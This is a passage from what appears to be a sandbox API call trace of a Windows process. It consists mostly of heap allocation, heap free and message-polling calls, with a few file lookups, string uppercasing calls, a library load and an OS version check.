wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.966] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0251.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0251.966] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0251.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0251.966] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0251.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0251.967] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0251.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0251.967] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HwKg28SMvdgN7pz7S.wav", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6eaf9690, ftCreationTime.dwHighDateTime=0x1d4caa6, ftLastAccessTime.dwLowDateTime=0xf62ebce0, ftLastAccessTime.dwHighDateTime=0x1d4d203, ftLastWriteTime.dwLowDateTime=0xf62ebce0, ftLastWriteTime.dwHighDateTime=0x1d4d203, nFileSizeHigh=0x0, nFileSizeLow=0x3fd3, dwReserved0=0xaa0530, dwReserved1=0xc152, cFileName="HwKg28SMvdgN7pz7S.wav", cAlternateFileName="HWKG28~1.WAV")) returned 0xaa58a0 [0251.967] FindClose (in: hFindFile=0xaa58a0 | out: hFindFile=0xaa58a0) returned 1 [0251.967] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0251.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0251.967] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0251.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0251.968] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0251.968] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0251.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0251.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0251.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0251.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0251.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0251.969] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0251.969] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.969] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0251.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0251.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0251.969] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0251.969] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0251.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0251.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0251.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0251.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0251.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0251.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0251.970] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0251.970] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0251.970] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0251.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0251.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0251.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0251.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0251.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0251.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0251.970] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0251.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0251.970] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0251.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0251.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0251.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0251.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0251.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0251.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0251.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0251.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0251.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0251.972] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0251.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0251.972] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0251.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0251.972] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0251.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0251.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0251.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0251.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2da8 [0251.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0251.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0251.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0251.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0251.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa448 [0251.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0251.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0251.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0251.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0251.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0251.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0251.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0251.974] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0251.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0251.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0251.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0251.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0251.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0251.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0251.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0251.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0251.977] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0251.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0251.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0251.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0251.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0251.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0251.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0251.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0251.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0251.978] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 1 [0251.978] TranslateMessage (lpMsg=0x8bf250) returned 0 [0251.978] DispatchMessageW (lpMsg=0x8bf250) returned 0x0 [0251.978] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0251.978] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0251.978] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0251.978] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0251.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0251.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0251.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0251.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0251.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0251.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0251.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0251.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0251.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0251.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0251.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0251.979] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0251.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0251.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0251.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0251.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0251.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0251.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0251.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0251.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0251.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0251.980] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0251.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0251.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0251.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0251.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0251.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0251.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0251.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0251.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0251.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0251.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0251.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0251.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0251.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0251.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0251.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0251.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0251.981] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0251.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0251.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0251.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0251.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0251.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0251.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0251.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0251.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0251.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0251.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0251.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0251.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0251.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0251.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0251.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0251.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0251.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0251.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0251.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0251.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0251.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0251.983] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0251.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0251.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0251.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0251.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0251.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0251.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0251.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0251.983] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0251.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0251.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0251.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa78 [0251.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0251.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0251.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa2e0 [0251.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0251.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0251.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0251.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0251.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0251.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0251.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0251.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0251.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0251.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0251.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0251.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0251.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0251.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0251.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0251.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0251.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0251.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0251.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0251.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0251.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0251.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0251.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0251.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0251.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0251.986] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0251.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0251.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 